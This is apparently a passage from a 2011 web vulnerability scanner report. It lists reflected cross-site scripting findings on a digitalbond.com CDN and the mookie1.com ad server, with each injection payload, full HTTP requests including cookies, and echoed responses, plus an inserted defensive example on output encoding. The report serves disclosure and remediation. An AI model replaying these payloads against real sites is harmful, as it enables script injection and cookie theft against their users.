X-Powered-By: W3 Total Cache/0.9.1.3
Last-Modified: Tue, 19 Apr 2011 20:08:01 GMT
Cache-Control: max-age=86400
X-Varnish: 1668602724
Age: 0
Via: 1.1 varnish
X-Cache: MISS
Content-Length: 42983

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head>
<
...[SNIP]...
<form method="post" action="http://www.digitalbond.com/wp-content646e0\"><script>alert(1)</script>27728feb339/themes/atahualpa/js/DD_roundies.js?ver=0.0.2a&amp;_login=10957bbbdd">
...[SNIP]...

3.162. http://digibond.wpengine.netdna-cdn.com/wp-content/themes/atahualpa/js/DD_roundies.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://digibond.wpengine.netdna-cdn.com
Path:   /wp-content/themes/atahualpa/js/DD_roundies.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 57026"><script>alert(1)</script>74b1e57ccc9 was submitted in the REST URL parameter 2. This input was echoed as 57026\"><script>alert(1)</script>74b1e57ccc9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themes57026"><script>alert(1)</script>74b1e57ccc9/atahualpa/js/DD_roundies.js?ver=0.0.2a HTTP/1.1
Host: digibond.wpengine.netdna-cdn.com
Proxy-Connection: keep-alive
Referer: http://www.digitalbond.com/2008/07/20/managing-your-security-career5f595%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E67a759c718b/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.36
Date: Tue, 19 Apr 2011 20:08:34 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Pragma: no-cache
X-Pingback: http://www.digitalbond.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Last-Modified: Tue, 19 Apr 2011 20:08:31 GMT
Cache-Control: max-age=86400
X-Varnish: 1668605038
Age: 0
Via: 1.1 varnish
X-Cache: MISS
Content-Length: 43006

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head>
<
...[SNIP]...
<form method="post" action="http://www.digitalbond.com/wp-content/themes57026\"><script>alert(1)</script>74b1e57ccc9/atahualpa/js/DD_roundies.js?ver=0.0.2a&amp;_login=9ba590e89e">
...[SNIP]...

3.163. http://digibond.wpengine.netdna-cdn.com/wp-content/themes/atahualpa/js/DD_roundies.js [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://digibond.wpengine.netdna-cdn.com
Path:   /wp-content/themes/atahualpa/js/DD_roundies.js

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2b46e"><script>alert(1)</script>5ec3496cd24 was submitted in the REST URL parameter 5. This input was echoed as 2b46e\"><script>alert(1)</script>5ec3496cd24 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themes/atahualpa/js/DD_roundies.js2b46e"><script>alert(1)</script>5ec3496cd24?ver=0.0.2a HTTP/1.1
Host: digibond.wpengine.netdna-cdn.com
Proxy-Connection: keep-alive
Referer: http://www.digitalbond.com/2008/07/20/managing-your-security-career5f595%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E67a759c718b/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.36
Date: Tue, 19 Apr 2011 20:09:05 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
X-Pingback: http://www.digitalbond.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Last-Modified: Tue, 19 Apr 2011 20:09:01 GMT
Vary: User-Agent,Accept-Encoding
Content-Length: 43040

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head>
<
...[SNIP]...
<form method="post" action="http://digibond.wpengine.netdna-cdn.com/wp-content/themes/atahualpa/js/DD_roundies.js2b46e\"><script>alert(1)</script>5ec3496cd24?ver=0.0.2a&amp;_login=5410b6ce8a">
...[SNIP]...

3.164. http://digibond.wpengine.netdna-cdn.com/wp-includes/js/l10n.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://digibond.wpengine.netdna-cdn.com
Path:   /wp-includes/js/l10n.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 398c9"><script>alert(1)</script>4e487c44e11 was submitted in the REST URL parameter 1. This input was echoed as 398c9\"><script>alert(1)</script>4e487c44e11 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-includes398c9"><script>alert(1)</script>4e487c44e11/js/l10n.js?ver=20101110 HTTP/1.1
Host: digibond.wpengine.netdna-cdn.com
Proxy-Connection: keep-alive
Referer: http://www.digitalbond.com/2008/07/20/managing-your-security-career5f595%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E67a759c718b/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.36
Date: Tue, 19 Apr 2011 20:07:53 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Pragma: no-cache
X-Pingback: http://www.digitalbond.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Last-Modified: Tue, 19 Apr 2011 20:07:49 GMT
Cache-Control: max-age=86400
X-Varnish: 1668601693
Age: 0
Via: 1.1 varnish
X-Cache: MISS
Content-Length: 42893

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head>
<
...[SNIP]...
<form method="post" action="http://www.digitalbond.com/wp-includes398c9\"><script>alert(1)</script>4e487c44e11/js/l10n.js?ver=20101110&amp;_login=7b94eab575">
...[SNIP]...

3.165. http://digibond.wpengine.netdna-cdn.com/wp-includes/js/l10n.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://digibond.wpengine.netdna-cdn.com
Path:   /wp-includes/js/l10n.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5e502"><script>alert(1)</script>87deeb2ec4f was submitted in the REST URL parameter 3. This input was echoed as 5e502\"><script>alert(1)</script>87deeb2ec4f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-includes/js/l10n.js5e502"><script>alert(1)</script>87deeb2ec4f?ver=20101110 HTTP/1.1
Host: digibond.wpengine.netdna-cdn.com
Proxy-Connection: keep-alive
Referer: http://www.digitalbond.com/2008/07/20/managing-your-security-career5f595%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E67a759c718b/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.36
Date: Tue, 19 Apr 2011 20:08:24 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
X-Pingback: http://www.digitalbond.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Last-Modified: Tue, 19 Apr 2011 20:08:21 GMT
Vary: User-Agent,Accept-Encoding
Content-Length: 42947

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head>
<
...[SNIP]...
<form method="post" action="http://digibond.wpengine.netdna-cdn.com/wp-includes/js/l10n.js5e502\"><script>alert(1)</script>87deeb2ec4f?ver=20101110&amp;_login=ba7f702b91">
...[SNIP]...

3.166. http://dm.de.mookie1.com/2/B3DM/2010DM/12086108130@x23 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/12086108130@x23

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dbd65"><script>alert(1)</script>dfef0ede538 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DMdbd65"><script>alert(1)</script>dfef0ede538/2010DM/12086108130@x23?USNetwork/Dominos_11Q2_247_CPC_728 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://b3.mookie1.com/2/247B3/Dominos/11Q2/CPC/728/1849951236@x90
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW802rT5oABV/F; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2145525d5f4f58455e445a4a423660; dlx_20100929=set; other_20110126=set; id=914804995789526; session=1303242610|1303242619

Response

HTTP/1.1 200 OK
Date: Tue, 19 Apr 2011 20:06:33 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 333
Content-Type: text/html

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DMdbd65"><script>alert(1)</script>dfef0ede538/2010DM/467996617/x23/default/empty.gif/726348573830327254356f4142562f46?x" target="_top"><I
...[SNIP]...
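The findings above (the digitalbond 404 page and the mookie1 click-through link) are the same bug in two places: a path segment taken from the request URL is concatenated into a double-quoted HTML attribute, so `"><script>` closes the attribute and opens a tag. The digitalbond response is worth a second look: the server emitted `\"><script>`, i.e. it backslash-escaped the quote, which protects a JavaScript string literal but does nothing inside an HTML attribute. The following is an added example, not code from the report or from either site: it reproduces the vulnerable concatenation, shows the hardened form (percent-encode each path segment when building the URL, then attribute-encode the whole value when emitting HTML), and includes a small reflection check in the spirit of the scanner's own test. The host name and the sample segments are taken from the response above; `renderClickLink*`, `classifyReflection` and `attributeBreakout` are names chosen here.

```javascript
// Added example (not from the report): attribute-context breakout, hardened
// equivalent, and a reflection check. Node.js, no dependencies.
'use strict';

// HTML attribute encoding: the five characters that matter inside a quoted attribute.
function encodeForHtmlAttribute(s) {
  return String(s).replace(/[&<>"']/g, (c) => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
  }[c]));
}

// Vulnerable pattern: request path segments are concatenated straight into
// HREF="...". This is what the scanner's response body shows.
function renderClickLinkVulnerable(segments) {
  const href = 'http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/' + segments.join('/');
  return '<A HREF="' + href + '" target="_top">';
}

// Hardened: percent-encode each segment when building the URL (correct for the URL
// grammar), then attribute-encode the whole value when emitting HTML (correct for
// the HTML grammar). Each layer handles its own syntax; neither replaces the other.
function renderClickLinkHardened(segments) {
  const href = 'http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/' +
    segments.map(encodeURIComponent).join('/');
  return '<A HREF="' + encodeForHtmlAttribute(href) + '" target="_top">';
}

// Reflection check: payload present verbatim, present only after URL decoding
// (the scanner reports that case as "echoed as ..."), or not present at all.
function classifyReflection(body, payload) {
  if (body.includes(payload)) return 'unmodified';
  let decoded;
  try { decoded = decodeURIComponent(payload); } catch (e) { decoded = payload; }
  if (decoded !== payload && body.includes(decoded)) return 'url-decoded';
  return 'absent';
}

// Was the attribute actually closed? A `">` after the marker means the HTML parser
// starts a new tag. A preceding backslash does not change that in HTML, which is
// why the digitalbond `\"><script>` output is still a breakout.
function attributeBreakout(body, marker) {
  const i = body.indexOf(marker);
  return i !== -1 && body.slice(i).includes('"><');
}

// Payload and segments as they appear in finding 3.166.
const PAYLOAD = 'dbd65"><script>alert(1)</script>dfef0ede538';
const SEGMENTS = ['B3DM' + PAYLOAD, '2010DM', '467996617', 'x23', 'default', 'empty.gif'];
```

`encodeURIComponent` alone would already have stopped this particular payload (it turns `"` into `%22`), but it is the attribute encoding that makes the template safe regardless of where the value came from; the URL encoding is there because the value is a URL, not as an XSS defence.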

3.167. http://dm.de.mookie1.com/2/B3DM/2010DM/12086108130@x23 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/12086108130@x23

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 48cc0"><script>alert(1)</script>b9e470def13 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/2010DM48cc0"><script>alert(1)</script>b9e470def13/12086108130@x23?USNetwork/Dominos_11Q2_247_CPC_728 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://b3.mookie1.com/2/247B3/Dominos/11Q2/CPC/728/1849951236@x90
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW802rT5oABV/F; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2145525d5f4f58455e445a4a423660; dlx_20100929=set; other_20110126=set; id=914804995789526; session=1303242610|1303242619

Response

HTTP/1.1 200 OK
Date: Tue, 19 Apr 2011 20:06:35 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 334
Content-Type: text/html

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/2010DM48cc0"><script>alert(1)</script>b9e470def13/1058946340/x23/default/empty.gif/726348573830327254356f4142562f46?x" target="_top"><
...[SNIP]...

3.168. http://dm.de.mookie1.com/2/B3DM/2010DM/12086108130@x23 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/12086108130@x23

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a8d4f"><script>alert(1)</script>91bcd1e71d8 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/2010DM/12086108130@x23a8d4f"><script>alert(1)</script>91bcd1e71d8?USNetwork/Dominos_11Q2_247_CPC_728 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://b3.mookie1.com/2/247B3/Dominos/11Q2/CPC/728/1849951236@x90
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW802rT5oABV/F; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2145525d5f4f58455e445a4a423660; dlx_20100929=set; other_20110126=set; id=914804995789526; session=1303242610|1303242619

Response

HTTP/1.1 200 OK
Date: Tue, 19 Apr 2011 20:06:37 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 326
Content-Type: text/html

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/2010DM/1086585598/x23a8d4f"><script>alert(1)</script>91bcd1e71d8/default/empty.gif/726348573830327254356f4142562f46?x" target="_top"><
...[SNIP]...

3.169. http://dm.de.mookie1.com/2/B3DM/2010DM/12086108130@x23 [USNetwork/Dominos_11Q2_247_CPC_728 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/12086108130@x23

Issue detail

The value of the USNetwork/Dominos_11Q2_247_CPC_728 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 79e43"-alert(1)-"2c71c5674a2 was submitted in the USNetwork/Dominos_11Q2_247_CPC_728 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2/B3DM/2010DM/12086108130@x23?USNetwork/Dominos_11Q2_247_CPC_72879e43"-alert(1)-"2c71c5674a2 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://b3.mookie1.com/2/247B3/Dominos/11Q2/CPC/728/1849951236@x90
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW802rT5oABV/F; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2145525d5f4f58455e445a4a423660; dlx_20100929=set; other_20110126=set; id=914804995789526; session=1303242610|1303242619

Response

HTTP/1.1 200 OK
Date: Tue, 19 Apr 2011 20:06:31 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2438
Content-Type: text/html

<html>
<head></head>
<body>
<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e);
}
var camp="USNetwork/Dominos_11Q2_247_CPC_72879e43"-alert(1)-"2c71c5674a2";

camp=camp.toUpperCase();

if((camp.indexOf("AOL") == -1 )&&(camp.indexOf("GGL")) == -1){
   if((cookie_check("dlx_20100929=",document.cookie)).length == 0) {

       // Set cookie with marker to ch
...[SNIP]...

3.170. http://dm.de.mookie1.com/2/B3DM/2010DM/12086108130@x23 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/12086108130@x23

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b86c4"-alert(1)-"968eecc14d7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2/B3DM/2010DM/12086108130@x23?USNetwork/Dominos_11Q2_247_CPC_728&b86c4"-alert(1)-"968eecc14d7=1 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://b3.mookie1.com/2/247B3/Dominos/11Q2/CPC/728/1849951236@x90
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW802rT5oABV/F; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2145525d5f4f58455e445a4a423660; dlx_20100929=set; other_20110126=set; id=914804995789526; session=1303242610|1303242619

Response

HTTP/1.1 200 OK
Date: Tue, 19 Apr 2011 20:06:32 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2441
Content-Type: text/html

<html>
<head></head>
<body>
<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e);
}
var camp="USNetwork/Dominos_11Q2_247_CPC_728&b86c4"-alert(1)-"968eecc14d7=1";

camp=camp.toUpperCase();

if((camp.indexOf("AOL") == -1 )&&(camp.indexOf("GGL")) == -1){
   if((cookie_check("dlx_20100929=",document.cookie)).length == 0) {

       // Set cookie with marker to
...[SNIP]...

3.171. http://dm.de.mookie1.com/2/B3DM/2010DM/1377241392@x23 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/1377241392@x23

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6939f"><script>alert(1)</script>d229212c062 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM6939f"><script>alert(1)</script>d229212c062/2010DM/1377241392@x23?USNetwork/Dominos_11Q2_247_CPC_728 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://b3.mookie1.com/2/247B3/Dominos/11Q2/CPC/728/11060627171@x90
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW802rT5oABV/F; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2145525d5f4f58455e445a4a423660; dlx_20100929=set; other_20110126=set; id=914804995789526; session=1303242610|1303242610

Response

HTTP/1.1 200 OK
Date: Tue, 19 Apr 2011 20:04:28 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 333
Content-Type: text/html

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM6939f"><script>alert(1)</script>d229212c062/2010DM/563051834/x23/default/empty.gif/726348573830327254356f4142562f46?x" target="_top"><I
...[SNIP]...

3.172. http://dm.de.mookie1.com/2/B3DM/2010DM/1377241392@x23 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/1377241392@x23

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d7757"><script>alert(1)</script>67578923dc4 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/2010DMd7757"><script>alert(1)</script>67578923dc4/1377241392@x23?USNetwork/Dominos_11Q2_247_CPC_728 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://b3.mookie1.com/2/247B3/Dominos/11Q2/CPC/728/11060627171@x90
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW802rT5oABV/F; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2145525d5f4f58455e445a4a423660; dlx_20100929=set; other_20110126=set; id=914804995789526; session=1303242610|1303242610

Response

HTTP/1.1 200 OK
Date: Tue, 19 Apr 2011 20:04:30 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 334
Content-Type: text/html

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/2010DMd7757"><script>alert(1)</script>67578923dc4/1694518381/x23/default/empty.gif/726348573830327254356f4142562f46?x" target="_top"><
...[SNIP]...

3.173. http://dm.de.mookie1.com/2/B3DM/2010DM/1377241392@x23 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/1377241392@x23

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload db149"><script>alert(1)</script>45420a5298d was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/2010DM/1377241392@x23db149"><script>alert(1)</script>45420a5298d?USNetwork/Dominos_11Q2_247_CPC_728 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://b3.mookie1.com/2/247B3/Dominos/11Q2/CPC/728/11060627171@x90
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW802rT5oABV/F; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2145525d5f4f58455e445a4a423660; dlx_20100929=set; other_20110126=set; id=914804995789526; session=1303242610|1303242610

Response

HTTP/1.1 200 OK
Date: Tue, 19 Apr 2011 20:04:33 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 325
Content-Type: text/html

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/2010DM/783297670/x23db149"><script>alert(1)</script>45420a5298d/default/empty.gif/726348573830327254356f4142562f46?x" target="_top"><I
...[SNIP]...

3.174. http://dm.de.mookie1.com/2/B3DM/2010DM/1377241392@x23 [USNetwork/Dominos_11Q2_247_CPC_728 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/1377241392@x23

Issue detail

The value of the USNetwork/Dominos_11Q2_247_CPC_728 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7bcfc"-alert(1)-"38d19f0405 was submitted in the USNetwork/Dominos_11Q2_247_CPC_728 parameter. This input was echoed unmodified in the application's response.
